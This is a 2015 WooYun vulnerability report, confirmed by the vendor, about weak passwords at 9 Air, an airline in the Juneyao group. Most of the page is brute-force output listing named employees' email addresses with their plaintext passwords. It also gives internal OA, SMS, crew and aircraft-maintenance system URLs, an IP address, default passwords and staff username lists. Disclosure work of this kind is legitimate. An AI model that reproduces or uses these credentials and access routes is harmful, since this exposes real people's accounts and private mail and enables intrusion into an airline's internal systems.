当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144609

漏洞标题:航空安全之均瑶集团旗下某航空公司漏洞打包提交(泄漏内部通讯录\大量内部敏感信息\进入多个内部敏感系统)

相关厂商:juneyaoair.com

漏洞作者: harbour_bin

提交时间:2015-10-03 11:26

修复时间:2015-11-21 13:34

公开时间:2015-11-21 13:34

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-03: 细节已通知厂商并且等待厂商处理中
2015-10-07: 厂商已经确认,细节仅向厂商公开
2015-10-17: 细节向核心白帽子及相关领域专家公开
2015-10-27: 细节向普通白帽子公开
2015-11-06: 细节向实习白帽子公开
2015-11-21: 细节向公众公开

简要描述:

RT
PS:花了很长时间,发个礼物呗!

详细说明:

从以前的渗透情况可知, 9元航空和吉祥航空都是均瑶集团旗下的, 而它一直没人确认, 个人感觉危害比较大, 可以的话, 麻烦转交一下, 感谢!
1、渗透分析
WooYun: 航空安全值吉祥航空内网小漫游(账号体系控制不严/内部通讯录泄漏) , 我们获取9元航空的部分人员的邮箱号, 与此同时, 我们发现邮箱为163邮箱, 其密码的常用特点是字母、数字、特殊字符3选2. 构建一个用户名字典、密码字典, 爆破pop.
2、大量邮箱存在弱口令

[+] Login successful: xiebo@9air.com abc123
[+] Mail: 77 emails
[+] Size: 188124346 bytes
[+] Login successful: yuxiudao@9air.com abc123
[+] Mail: 160 emails
[+] Size: 239599894 bytes
[+] Login successful: maguangfeng@9air.com abc123456
[+] Mail: 32 emails
[+] Size: 4488587 bytes
[+] Login successful: huanghe@9air.com 9air123
[+] Mail: 207 emails
[+] Size: 733787376 bytes


翻看邮箱, 发现企业邮箱通讯录和默认邮箱账号

QQ截图20150930163725.jpg


3、根据企业邮箱账号和默认邮箱账号9air.com进一步爆破

[+] Login successful: lizi@9air.com 9air.com
[+] Mail: 7531 emails
[+] Size: 176717828 bytes
[+] Login successful: xiongshaoshen@9air.com 9air.com
[+] Mail: 798 emails
[+] Size: 1201525373 bytes
[+] Login successful: zhouhuanan@9air.com 9air.com
[+] Mail: 132 emails
[+] Size: 265981162 bytes
[+] Login successful: 4001595999@9air.com 9air.com
[+] Mail: 15 emails
[+] Size: 874841 bytes
[+] Login successful: noc@9air.com 9air.com
[+] Mail: 18 emails
[+] Size: 1277714 bytes
[+] Login successful: luchuan@9air.com 9air.com
[+] Mail: 463 emails
[+] Size: 229775322 bytes
[+] Login successful: kefu@9air.com 9air.com
[+] Mail: 471 emails
[+] Size: 64557932 bytes
[+] Login successful: zhuzhaoqiang@9air.com 9air.com
[+] Mail: 47 emails
[+] Size: 43661143 bytes
[+] Login successful: zengqi@9air.com 9air.com
[+] Mail: 38 emails
[+] Size: 49132443 bytes
[+] Login successful: jira@9air.com 9air.com
[+] Mail: 3 emails
[+] Size: 20961 bytes
[+] Login successful: zhangzhihua@9air.com 9air.com
[+] Mail: 157 emails
[+] Size: 331412670 bytes
[+] Login successful: wangxiaopu@9air.com 9air.com
[+] Mail: 33 emails
[+] Size: 40064550 bytes
[+] Login successful: wangren@9air.com 9air.com
[+] Mail: 153 emails
[+] Size: 441027252 bytes
[+] Login successful: wangchenqu@9air.com 9air.com
[+] Mail: 40 emails
[+] Size: 41547555 bytes
[+] Login successful: sunlei@9air.com 9air.com
[+] Mail: 34 emails
[+] Size: 40778203 bytes
[+] Login successful: haohaixu@9air.com 9air.com
[+] Mail: 38 emails
[+] Size: 20938791 bytes
[+] Login successful: hanjinglong@9air.com 9air.com
[+] Mail: 33 emails
[+] Size: 40064557 bytes
[+] Login successful: chaiminji@9air.com 9air.com
[+] Mail: 42 emails
[+] Size: 50979826 bytes
[+] Login successful: caozhi@9air.com 9air.com
[+] Mail: 636 emails
[+] Size: 149931229 bytes
[+] Login successful: bixiangfei@9air.com 9air.com
[+] Mail: 54 emails
[+] Size: 82977717 bytes
[+] Login successful: liyuzhu@9air.com 9air.com
[+] Mail: 22 emails
[+] Size: 4489707 bytes
[+] Login successful: lvyong@9air.com 9air.com
[+] Mail: 4 emails
[+] Size: 763695 bytes
[+] Login successful: zhanglu@9air.com 9air.com
[+] Mail: 4 emails
[+] Size: 78373 bytes
[+] Login successful: zhangdajun@9air.com 9air.com
[+] Mail: 1236 emails
[+] Size: 4237431725 bytes
[+] Login successful: lianghanzhao@9air.com 9air.com
[+] Mail: 3622 emails
[+] Size: 4253055307 bytes
[+] Login successful: lixiaojian@9air.com 9air.com
[+] Mail: 249 emails
[+] Size: 694871405 bytes
[+] Login successful: zhangwenzhao@9air.com 9air.com
[+] Mail: 279 emails
[+] Size: 800910426 bytes
[+] Login successful: zhangwenting@9air.com 9air.com
[+] Mail: 251 emails
[+] Size: 696815028 bytes
[+] Login successful: wgzp@9air.com 9air.com
[+] Mail: 558 emails
[+] Size: 853391407 bytes
[+] Login successful: wgtm@9air.com 9air.com
[+] Mail: 378 emails
[+] Size: 989266599 bytes
[+] Login successful: wgqc@9air.com 9air.com
[+] Mail: 304 emails
[+] Size: 559520627 bytes
[+] Login successful: wgcd@9air.com 9air.com
[+] Mail: 134 emails
[+] Size: 462501565 bytes
[+] Login successful: outstation@9air.com 9air.com
[+] Mail: 77 emails
[+] Size: 300824836 bytes
[+] Login successful: hxzby@9air.com 9air.com
[+] Mail: 327 emails
[+] Size: 706473426 bytes
[+] Login successful: hxgjj@9air.com 9air.com
[+] Mail: 175 emails
[+] Size: 472742701 bytes
[+] Login successful: hc@9air.com 9air.com
[+] Mail: 87 emails
[+] Size: 302370101 bytes
[+] Login successful: et@9air.com 9air.com
[+] Mail: 36 emails
[+] Size: 78339109 bytes
[+] Login successful: engine@9air.com 9air.com
[+] Mail: 201 emails
[+] Size: 684885387 bytes
[+] Login successful: dingjianchejian@9air.com 9air.com
[+] Mail: 261 emails
[+] Size: 821981380 bytes
[+] Login successful: zhangzhuwei@9air.com 9air.com
[+] Mail: 363 emails
[+] Size: 623684541 bytes
[+] Login successful: diaodu@9air.com 9air.com
[+] Mail: 3594 emails
[+] Size: 901574058 bytes
[+] Login successful: aqzlc@9air.com 9air.com
[+] Mail: 41 emails
[+] Size: 25342215 bytes
[+] Login successful: lichengbin@9air.com 9air.com
[+] Mail: 25 emails
[+] Size: 60366763 bytes
[+] Login successful: zhouhuiru@9air.com 9air.com 管理员
[+] Mail: 410 emails
[+] Size: 284712377 bytes
[+] Login successful: zhaoyujie@9air.com 9air.com
[+] Mail: 88 emails
[+] Size: 31655178 bytes
[+] Login successful: zhangyuning@9air.com 9air.com
[+] Mail: 29 emails
[+] Size: 4286469 bytes
[+] Login successful: wutianqi@9air.com 9air.com
[+] Mail: 24 emails
[+] Size: 1791180 bytes
[+] Login successful: wuhuirong@9air.com 9air.com
[+] Mail: 53 emails
[+] Size: 7140306 bytes
[+] Login successful: wangxuezi@9air.com 9air.com
[+] Mail: 6 emails
[+] Size: 4695584 bytes
[+] Login successful: songwanwan@9air.com 9air.com
[+] Mail: 24 emails
[+] Size: 1786616 bytes
[+] Login successful: hezhongxin@9air.com 9air.com
[+] Mail: 37 emails
[+] Size: 8507485 bytes
[+] Login successful: fengsheng@9air.com 9air.com
[+] Mail: 45 emails
[+] Size: 8185301 bytes
[+] Login successful: zhaohaiyang@9air.com 9air.com
[+] Mail: 10 emails
[+] Size: 249146 bytes
[+] Login successful: baidu@9air.com 9air.com
[+] Mail: 4 emails
[+] Size: 29600 bytes
[+] Login successful: liangjieming@9air.com 9air.com
[+] Mail: 4 emails
[+] Size: 53948 bytes
[+] Login successful: hejian@9air.com 9air.com
[+] Mail: 918 emails
[+] Size: 619106007 bytes
[+] Login successful: jiazhenxiu@9air.com 9air.com
[+] Mail: 43 emails
[+] Size: 92876704 bytes
[+] Login successful: yangyusheng@9air.com 9air.com
[+] Mail: 134 emails
[+] Size: 285560311 bytes


证明内部敏感信息泄漏, 航空公司的工资真的高啊

敏感信息.jpg


敏感信息1.jpg


不继续列出来了
4、进入多个系统

http://oa.9air.com:8081 oa系统

默认账号:9air.com
多个账号是默认密码, 拿一个账号证明, 不深入了 证明:顾小光

oa.jpg


oa1.jpg

内部通讯录, 你们懂的, 第一个你们董事长

oa2.jpg


http://sms.9air.com/ sms系统

证明一下吧
默认密码:jyh9air.com (很多的都是默认密码, 不一一证明了, 自查一下呗)

sms.jpg

危害你们知道的, 我就不截图了

网上准备系统http://crew.9air.com/ 密码:888888


144	congwenlong	200	false	false	1174	
455 yangjian 200 false false 1178
508 huoxin 200 false false 1178
511 huangxiaoli 200 false false 1178
528 dingjun 200 false false 1178
539 lihailong 200 false false 1178
543 wenxudong 200 false false 1178
546 wangzhijun 200 false false 1178
550 hanqi 200 false false 1178
557 sunshina 200 false false 1178
559 liujingwen 200 false false 1178
578 zhaoyafang 200 false false 1178
580 weihanjun 200 false false 1178
588 hejian 200 false false 1178
119 wangren 200 false false 1184
133 liuguangping 200 false false 1184
157 zhengxiongfei 200 false false 1184
159 zhanglu 200 false false 1184


crew1.jpg


crew2.jpg

通讯信息

crew3.jpg

还有的不截图了, 你们懂得

http://203.156.207.29:8080/mes/飞机维修管理系统


234	suohai	200	false	false	22717	
273 liyirui 200 false false 15064
366 wuweibiao 200 false false 11833
246 zhangguanghui 200 false false 8024
310 fuyongpeng 200 false false 8021
301 liuyifeng 200 false false 8020
243 zhouwen1 200 false false 7568
382 zhongshaofeng 200 false false 7495
317 zhangyingjie 200 false false 7494
327 zhangzongjie 200 false false 7494
349 huangguanwei 200 false false 7494
363 liangweidong 200 false false 7494
374 chentianming 200 false false 7494
375 zhangjianwen 200 false false 7494
330 guoyingquan 200 false false 7493
338 zhangyinzhu 200 false false 7493
341 lizhengbing 200 false false 7493
345 lishengcai 200 false false 7492
358 guoyaoming 200 false false 7492
372 kongyuhang 200 false false 7492
347 huaweilai 200 false false 7491
376 yanglifei 200 false false 7491
391 yinjieyan 200 false false 7491
359 zhonghui 200 false false 7488
377 qincong 200 false false 7487
379 zhanjie 200 false false 7487
386 luochen 200 false false 7487
331 hanbin 200 false false 7486
333 zhaole 200 false false 7486
378 liutao 200 false false 7486
387 jiqing 200 false false 7486
388 chenze 200 false false 7486
540 liubao 200 false false 7486
364 lihao 200 false false 7485
369 xutao 200 false false 7485


mes1.jpg


mes2.jpg


东西很多, 仅证明, 不深入了吧!

漏洞证明:

已证明!
危害不够, 可补充, 谢谢!

修复方案:

你们更专业!

版权声明:转载请注明来源 harbour_bin@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-10-07 13:33

厂商回复:

漏洞已确认

最新状态:

暂无


漏洞评价:

评论

  1. 2015-10-07 17:03 | 找寻者 ( 路人 | Rank:2 漏洞数:1 | 学习啊)

    沙发 9:10收10WB,手续协商...进社区学习ing